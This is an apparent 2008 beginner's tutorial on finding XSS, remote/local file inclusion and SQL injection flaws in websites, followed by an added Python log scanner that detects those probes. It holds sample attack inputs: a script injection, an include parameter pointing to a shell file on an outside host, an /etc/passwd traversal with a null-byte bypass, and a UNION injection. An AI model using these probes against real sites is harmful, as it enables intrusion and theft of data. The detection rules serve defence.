Spotting Vulnerable Websites

[ How to find vulnerabilities in websites | The Newbie Guide ]


[+] XSS :
|
|- Definition: Cross Site Scripting.
|
|- Technical Definition: Injecting HTML (or script) into a page, either permanently (stored) or not (reflected).
|
|- Example:


<script>alert("XSS")</script>



|
|- Where is it found:
|
| [ Search Engines ] || [ GET Variables ] || [ Different Forms ]
|
|- Spotting it:
|
| [ Search Engines ]
|
| If the search term you enter is echoed back on the page, the chances are
| it is vulnerable.
|
| [ GET Variables ]
|
| If the GET var is echoed on the page, the site is most likely
| vulnerable. Checking the hidden tags is also helpful;
| sometimes the GET var is stored in a hidden tag to be used later.
|
| [ Different Forms ]
|
| Login forms, or any input form you can find on a site, could be
| vulnerable. Check it by checking whether the input is echoed back.
|
|__________________________________________________________________
|
|
|
[+] RFI / LFI :
|
| - Definition: Remote File Inclusion | Local File Inclusion.
|
| - Technical Definition:
| [ RFI ] Execution of a remote script on a target server,
| by including it.
| [ LFI ] Execution, or disclosure of files, that are on the same
| target server.
|
| - Example:
|
|


?page=http:/www.darkmindz.com/shell/x2300.txt?



|


?page=../../../../etc/passwd



|
| - Where is it found:
| [ GET Variables ]
|
| - Spotting it:
|
| [ GET Variables ]
|
| It is mostly common sense: if you see the main page redirecting to other pages
| by a GET var, it is most likely vulnerable.
| Sometimes it might be hiding behind an integer; you can spot it by changing
| that GET var to anything else, and if you see any main() errors,
| it is vulnerable.
| A common way to bypass some extension restrictions is to null-byte the extension, by:


?page=../../../../etc/passwd%00



|
|______________________________________________________________________
|
|
|
[+] SQL Injection :
|
| - Definition: [ the name says it all ]
|
| - Technical definition: Injecting SQL to echo out data from other tables / rows, etc.
|
| - Example:
|
|


?id=-- UNION SELECT ALL FROM USERS /*



|
| - Where is it found:
|
| [ GET Variables ] || [ Login Forms ] || [ Search Engine ] || [ Different Forms ]
|
| - Spotting it:
|
| [ GET variables ]
|
| Most of the time, it is an integer that we are looking for in a GET var, for example: ' ?id=123 ' ' ?cat=22 ' etc.
| If we change that integer to a quote or anything else, we could get a MySQL error; then we know that this site
| might be vulnerable.
|
| [ Login Forms ]
|
| We can try to inject a normal SQL injection in a login form, because most login forms pass the input through
| a SQL query to check for data.
|
| [ Search Engine ]
|
| The same applies here: most search engines look for the info in a SQL DB, so we can always inject that.
|
| [ Different Forms ]
|
| The general rule applies: you can try a random SQL injection with different quote styles to see whether it
| shows any errors or not.
|
|______________________________________________________________________
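Turning the "spotting" tips above around to the server side, here is an added example (not part of the original tutorial) that scans Apache-style access-log lines for the probe shapes this page describes: a remote URL or a ../ traversal with a %00 null byte in an include parameter, a quote or UNION in a numeric parameter, and script tags in a search field. The log lines, hostnames and paths are constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not real traffic), one request per line.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2008:20:11:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.5 - - [18/Feb/2008:20:11:01 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 88
10.0.0.5 - - [18/Feb/2008:20:11:02 +0000] "GET /index.php?page=http://attacker.example/x.txt? HTTP/1.1" 200 1024
10.0.0.5 - - [18/Feb/2008:20:11:03 +0000] "GET /news.php?id=123' HTTP/1.1" 500 301
10.0.0.5 - - [18/Feb/2008:20:11:04 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1" 200 640
10.0.0.5 - - [18/Feb/2008:20:11:05 +0000] "GET /news.php?id=124 HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# The tutorial's "spotting" tips turned around: what each probe looks like in a
# decoded parameter value. Checked in order, first match wins.
RULES = [
    ("RFI", re.compile(r"^\s*(?:https?|ftp)://", re.I)),     # remote URL handed to an include
    ("LFI", re.compile(r"\.\.[/\\]|\x00")),                   # ../ traversal or %00 null byte
    ("XSS", re.compile(r"<\s*/?[a-z!]|javascript:", re.I)),   # HTML/script that may be echoed
    ("SQLI", re.compile(r"['\"]|\bunion\b|--|/\*", re.I)),    # quote, UNION or SQL comment
]

def classify_value(value: str) -> Optional[str]:
    """Return the probe type for one decoded parameter value, or None if benign."""
    for kind, pattern in RULES:
        if pattern.search(value):
            return kind
    return None

def classify_request(url: str) -> List[Tuple[str, str]]:
    """Return (parameter, probe type) for every suspicious parameter in a request URL."""
    # parse_qsl percent-decodes values, so %00 arrives as a real NUL byte.
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [(name, kind) for name, value in pairs
            for kind in [classify_value(value)] if kind]

def scan_log(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line number, path, parameter, probe type) for each flagged request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if m:
            path = urlsplit(m.group(1)).path
            findings += [(lineno, path, n, k) for n, k in classify_request(m.group(1))]
    return findings
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 5 and leaves the two ordinary requests alone; the same rules work for a WAF or IDS signature, with the usual caveat that keyword matches on search fields produce false positives.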

Well that was it, I hope you learned something from this tutorial, and questions / comments are welcomed.

by r3dr0ot | 2008/02/18 20:11 | →Basic Articles | Trackback | Pingback(1)
